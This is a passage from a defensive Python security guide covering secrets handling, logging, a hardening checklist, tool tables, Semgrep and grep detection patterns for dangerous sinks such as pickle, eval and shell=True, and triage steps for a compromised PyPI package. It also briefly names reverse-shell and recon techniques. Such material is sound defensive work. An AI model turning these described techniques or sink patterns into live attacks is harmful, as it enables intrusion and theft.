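The check runs at resolution time, so a symlink swapped in afterwards can still redirect the open. That is the case where os.O_NOFOLLOW remains relevant.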
Cryptography
- secrets module for tokens, keys, password resets.
- hmac.compare_digest for any secret comparison.
- cryptography package (preferred over pycryptodome for new code; both are fine, but cryptography is the mainstream choice).
- argon2-cffi or bcrypt for password hashing.
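The first two items need only the standard library. The sketch below generates a reset token with `secrets` and verifies an HMAC-SHA256 signature with a constant-time comparison. The function names and the 32-byte token size are illustrative choices.

```python
import hashlib
import hmac
import secrets


def new_reset_token() -> str:
    """Return a URL-safe token with 32 bytes of OS-provided randomness."""
    return secrets.token_urlsafe(32)


def sign(message: bytes, key: bytes) -> str:
    """Return the hex HMAC-SHA256 of message under key."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify(message: bytes, key: bytes, signature: str) -> bool:
    """Constant-time comparison avoids leaking how many characters matched."""
    expected = sign(message, key).encode()
    return hmac.compare_digest(expected, signature.encode())
```

Comparing with `==` instead would return as soon as the first differing character is found, which is the timing side channel that compare_digest is designed to close.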
HTTP client
import requests
s = requests.Session()
s.verify = True # explicit
s.headers.update({"User-Agent": "myapp/1.0"})
r = s.get(url, timeout=(3, 10), allow_redirects=False) # control redirects yourself
Set timeouts always (default is infinite).
Assert statements
assert is stripped when Python runs with -O (optimize). Never use assert for security checks (authentication, authorization, input validation). Bandit B101 flags this. Use explicit if/raise instead.
Logging
- Never log request bodies, auth headers, cookies, or tokens.
- Use logging.Filter to scrub PII.
- Log security events (auth failures, authz denials, file access) at a distinct level to separate destinations.
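A scrubbing filter can be sketched as below. The regular expression covers only simple key=value secrets and is an illustrative assumption; real deployments usually need patterns tuned to their own log formats.

```python
import logging
import re

SECRET_PATTERN = re.compile(r"(?i)\b(authorization|token|password|api[_-]?key)=\S+")


class RedactSecrets(logging.Filter):
    """Mask key=value secrets in the final formatted message."""

    def filter(self, record: logging.LogRecord) -> bool:
        message = record.getMessage()  # merge msg and args first
        record.msg = SECRET_PATTERN.sub(r"\1=[REDACTED]", message)
        record.args = ()  # already merged, so nothing is left to interpolate
        return True  # keep the record; only its text changes
```

A filter attached to a logger sees only records logged directly on that logger. Attaching it to the handler instead covers records propagated from child loggers as well.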
Secrets
- .env only for local dev; gitignore it.
- Prod: AWS Secrets Manager, GCP Secret Manager, Vault, SOPS, Doppler.
- Rotate SECRET_KEY / JWT_SECRET periodically.
- Assume any secret committed to Git is burned: rotate, don’t just git rm.
Dependency hygiene
- Pin all direct deps with hashes.
- Reproducible lockfile in CI.
- Weekly pip-audit run.
- Monitor GitHub Security Advisories (or Dependabot, Snyk, Aikido).
18. Hardening Checklist
Application
- Python version is in-support (3.12+ minimum, 3.13/3.14 recommended; 3.9 and 3.8 are EOL).
- Virtualenv or container isolates deps from system Python.
- DEBUG / debug toolbars off in production.
- No eval / exec / compile on user input (Bandit B102/B307 clean).
- No pickle.load(s) / yaml.load on untrusted input (Bandit B301/B506 clean).
- No subprocess(..., shell=True) with interpolation (Bandit B602/B605 clean).
- All HTTP clients set timeouts.
- verify=False not present (Bandit B501 clean).
- cryptography / secrets / argon2 used, not random / md5 / sha1 for security.
- defusedxml for XML; json for interchange.
- safe_load only for YAML.
- tarfile / zipfile extraction uses member filtering.
Framework
- Django: DEBUG=False, ALLOWED_HOSTS set, SECURE_* headers, CSRF on, PickleSerializer not used.
- Flask: not app.run(debug=True), SECRET_KEY from secret manager, secure cookies.
- FastAPI: response_model always set, JWT algorithms explicit, Pydantic extra="forbid".
- Templates auto-escape on; no mark_safe / |safe on user input.
- SSTI pattern render_template_string(user_input) absent.
Dependencies
- requirements.txt / pyproject.toml locked with hashes.
- pip install --require-hashes in CI.
- SCA scanner enabled (pip-audit / Snyk / Aikido / Dependabot).
- Malicious-package scanner (Phylum / Socket / Aikido SafeChain).
- New packages age-gated (cool-off period).
- Internal PyPI mirror for production dependencies.
CI/CD
- GitHub Actions pinned to commit SHA, not tag.
- Trusted Publishers (OIDC) for PyPI upload, not long-lived tokens.
- Bandit + Semgrep run on every PR.
- Secret scanning pre-commit (gitleaks / detect-secrets).
- SBOM generated (cyclonedx-py or syft).
- Build runs in ephemeral runners.
- No secrets in build logs.
Runtime
- Container runs as non-root.
- Read-only filesystem where possible.
- seccomp profile blocking uncommon syscalls.
- Egress firewall / allow list.
- No access to cloud metadata from app processes (IMDSv2 + hop limit 1, or egress blocked).
- Structured logging to a SIEM.
- .pth files audited: find . -name '*.pth' -print0 | xargs -0 grep -lE 'exec|base64|subprocess'.
19. Tool Reference
Code security
| Tool | Scope | Strength |
|---|---|---|
| Bandit | Python AST patterns | Fast, zero-config, CI-friendly |
| Semgrep | Pattern + taint | Custom rules in YAML |
| CodeQL | Full dataflow | Deepest analysis, slower |
| Ruff | Lint + security | Fastest linter (10-100x Bandit); S ruleset mirrors Bandit checks |
| Pyre / Pysa | Taint (Meta) | Cross-function taint propagation for Django/Flask/FastAPI |
| mypy / pyright | Type checking | Catches type confusion bugs |
Dependency & supply chain
| Tool | Scope |
|---|---|
| pip-audit | PyPA official CVE scanner |
| Safety | Commercial DB, free tier |
| Snyk | SCA + reachability + license |
| OWASP Dependency-Check | Generic SCA |
| Phylum / Socket | Behavioral package analysis |
| Aikido SafeChain | Cool-off + typosquat detection |
| cyclonedx-py | SBOM generation |
Runtime
| Tool | Purpose |
|---|---|
| PyInstaller + hardening | Static binary minimization |
| Falco | Runtime syscall monitoring (K8s) |
| eBPF-based monitors (Tetragon, Tracee) | Process/file/net tracking |
| AppArmor / SELinux / seccomp | Syscall confinement |
| gVisor / Kata | Container sandboxing |
Training & labs
- PyGoat — Django OWASP Top 10 lab.
- VulPy / vulpy — Deliberately vulnerable Flask apps.
- OWASP Juice Shop (Node.js, but concepts transfer).
- PortSwigger Web Security Academy — free framework-agnostic labs.
- TryHackMe Python Basics — scripted security challenges.
Offensive awareness tools (know what attackers use)
- Reverse shells in Python: socket + subprocess patterns; defenders should detect outbound shell spawning via EDR/Falco.
- API exploit scripting: converting Burp Suite findings to Python requests PoCs for BOLA/IDOR/auth bypass demonstration.
- Vulnerability scanner patterns: port scanning + banner grabbing with socket / IPy; understand what automated recon looks like.
- de4py: AI-powered Python deobfuscator for malware analysis; useful for defenders analyzing packed/obfuscated Python malware.
20. Detection Quick Reference
Semgrep patterns (defensive)
## Unsafe pickle load from HTTP
rules:
  - id: flask-pickle-load
    pattern-either:
      - pattern: pickle.load(request.$X)
      - pattern: pickle.loads(request.$X)
      - pattern: pickle.load(io.BytesIO(request.$X))
    message: Insecure deserialization of HTTP request data
    severity: ERROR
    languages: [python]
  - id: flask-yaml-unsafe-load
    patterns:
      - pattern-either:
          - pattern: yaml.load($X)
          - pattern: yaml.load($X, Loader=yaml.Loader)
    message: Use yaml.safe_load instead
    severity: WARNING
    languages: [python]
  - id: requests-verify-false
    pattern: requests.$METHOD(..., verify=False, ...)
    message: TLS certificate verification is disabled
    severity: ERROR
    languages: [python]
  - id: exec-on-request
    patterns:
      - pattern-either:
          - pattern: exec(request.$X)
          - pattern: eval(request.$X)
    message: HTTP request data passed to exec/eval
    severity: ERROR
    languages: [python]
Bandit quick commands
bandit -r src/ # recursive
bandit -r src/ -ll # medium+ severity only
bandit -r src/ -f json -o out.json # machine-readable
bandit -r src/ --skip B101,B601 # exclude specific checks
bandit -c bandit.yaml -r src/ # custom config (exclude test files)
Grep patterns for triage
## dangerous sinks
grep -rEn 'pickle\.loads?|yaml\.load\(|eval\(|exec\(|shell=True|verify=False' src/
## tarfile risk
grep -rEn 'tarfile\.open|\.extractall' src/
## hardcoded secrets heuristic
grep -rEn '(api[_-]?key|secret|token|password)\s*=\s*["'\'']' src/
## .pth startup hook audit
find / -name '*.pth' -exec grep -lE 'exec|base64|subprocess' {} \; 2>/dev/null
Incident triage for compromised package
If a malicious version was installed (e.g., litellm 1.82.7/1.82.8):
- Isolate the host from the network.
- Preserve ~/.config/, /tmp/, site-packages/, shell history, journalctl.
- Identify IoCs: file hashes, .pth files, systemd user services you didn’t create.
- Rotate all credentials the host had access to: SSH keys, cloud creds, git tokens, CI secrets, DB passwords, API keys, crypto wallets.
- Audit cloud: IAM activity logs, Secrets Manager / SSM Parameter Store access, new IAM users/roles.
- Audit Kubernetes: look for node-setup-* pods, new service accounts, privileged pods in kube-system, new DaemonSets.
- Rebuild the host from a clean image; do not attempt in-place cleanup.
- Retrospective — why did the compromised version land? Pin-by-SHA, require-hashes, cool-off period, trusted publishers, post-install scanning.
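For the IoC step, a quick first check is whether any environment on the host has a known-bad release installed. The sketch below uses `importlib.metadata` to list installed distributions. The `COMPROMISED` table holds only the two litellm versions named in this section, and the function name is illustrative.

```python
from importlib import metadata

# Known-bad releases named in this section; extend from your own advisories.
COMPROMISED = {"litellm": {"1.82.7", "1.82.8"}}


def find_compromised(installed=None, compromised=COMPROMISED):
    """Return sorted (name, version) pairs that match a known-bad release."""
    if installed is None:
        # Default to whatever is installed in the current environment.
        installed = [
            (dist.metadata["Name"], dist.version) for dist in metadata.distributions()
        ]
    hits = set()
    for name, version in installed:
        # Normalize case and underscores so "LiteLLM" matches "litellm".
        if name and version in compromised.get(name.lower().replace("_", "-"), ()):
            hits.add((name, version))
    return sorted(hits)
```

The check needs to run once per virtualenv or container image. A clean result for the current version does not rule out a bad version having been installed and later upgraded, so pip logs and lockfile history are still worth reviewing.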
Common CodeQL sinks for Python
## Sinks
python.Deserialization.PickleLoad
python.Deserialization.YamlLoad
python.CommandInjection.ShellCommand
python.CodeInjection.Eval
python.SsrfSinks.Request
python.PathInjection.FileOpen
python.SqlInjection.RawCursor
## Sources
python.Flask.RequestSource
python.Django.RequestSource
python.FastAPI.RequestSource
Closing Notes
Python’s security posture in 2026 is dominated by three realities. Industry context: 72.1% of container customers use a Python image (Chainguard Q1 2026 report); AI-driven development is accelerating both code output and vulnerability discovery (300% more fixes applied, 145% increase in CVEs quarter-over-quarter). Over 21,500 CVEs were disclosed in H1 2026 alone — a 16-18% increase over 2024.
The language has no safe default for code-reachable untrusted input. Pickle, eval, subprocess, yaml.load, tarfile — all have historical safe alternatives, but the unsafe ones remain one-character shorter and one line less typing. Every project needs a SAST backstop.
Supply chain is now the highest-leverage attacker path. LiteLLM, Trivy, KICS, chimera-sandbox-extensions, telnyx, the PyTorch-nightly compromise, and the annual wave of typosquats all demonstrate that trust in PyPI is probabilistic, not absolute. Pin, hash, scan, cool-off, mirror.
The AI/ML stack is a new attack surface with old bugs. Hydra instantiate, Langflow exec, torch.load pickle gadgets, and LangChain code-generating agents are 2005-era RCE patterns in 2026-era wrappers. The defenders’ tools (sandboxes, allow lists, content type validation, pinned model revisions) are the same as always, but have to be applied earlier in the pipeline than any team is used to.
Treat every dynamic dispatch, every deserializer, every format string, every subprocess call, and every third-party dependency as a promise you are making on behalf of your users. The secrets, json, argparse, pathlib, cryptography, defusedxml, tomllib, safetensors, and subprocess (list form) modules exist specifically so you can keep that promise. Use them.
Enhanced May 2026 with Python Security Pipeline automation. Core content compiled from 184+ research articles covering Python language security, stdlib CVEs, Flask/Django/FastAPI frameworks, Jinja2 SSTI, pickle/YAML/PLY deserialization, AI/ML model format RCEs (NeMo, Uni2TS, ml-flextok, Hydra, SGLang), Langflow code injection (CVE-2025-3248, CVE-2026-33017), LiteLLM supply chain compromise, PyPI supply chain campaigns (chimera-sandbox-extensions DGA C2, telnyx .wav steganography), Python sandbox bypass techniques, static analysis tooling (Bandit, Semgrep, CodeQL, Ruff, Pysa), secure coding guidelines, and OWASP Top 10 as applied to Django. 2026 enhancements include: AI/ML security framework analysis, supply chain attack patterns, enhanced dependency management, container security, Python 3.15 security features, behavioral package analysis, SBOM integration, and defensive automation patterns for modern Python development.